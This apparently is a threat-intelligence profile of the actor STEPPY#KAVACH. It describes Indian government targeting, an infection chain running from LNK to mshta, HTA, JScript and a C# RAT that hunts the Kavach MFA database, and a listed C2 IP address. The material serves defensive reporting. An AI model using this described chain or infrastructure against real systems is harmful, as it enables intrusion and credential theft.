Cyber Threat Actor: STEPPY#KAVACH

The threat actor trackedas STEPPY#KAVACH, also known by that alias, is believed to operate from Pakistan. Public reporting links the group to the SideCopy/APT36/Transparent Tribe cluster of activity that has been previously attributed to Pakistani origins. STEPPY#KAVACH has been observed conducting focused intrusions against Indian government employees, with the primary targets appearing to be officials and agencies within the Indian state sector. The actor’s interest in locating the Kavach MFA database file shows an interest in the target’s authentication infrastructure. Researchers have previously attributed similar activity to Pakistani origins, linking STEPPY#KAVACH to the SideCopy/APT36 cluster.

Initial access typically begins with a spear‑phishing email that carries a compressed archive containing a malicious shortcut (.LNK) file disguised as an image. When the shortcut is opened it invokes mshta.exe to retrieve a remote HTML application (.hta) hosted on a compromised Indian‑government‑themed website. The .hta file launches a series of obfuscated JScript files that download a lure PNG, create directories, establish persistence via a Run‑key registry entry, and finally download and execute a C#‑based remote access trojan named mm1.exe. The mm1.exe RAT, built in December 2022, searches for the kavach.db file, communicates with a hard‑coded C2 IP address (155.133.23.244) located in Germany, and uses Triple‑DES in ECB mode to encrypt its command‑and‑control traffic. The malware also supports additional capabilities such as executing arbitrary VBS scripts, taking screenshots, and exfiltrating files, reflecting a tooling style that relies on legitimate Windows utilities and minimal obfuscation. The campaign described in the Securonix research from December 2022 represents a representative operation, showing the actor’s continued use of the described TTP set against Indian governmental targets over the preceding year.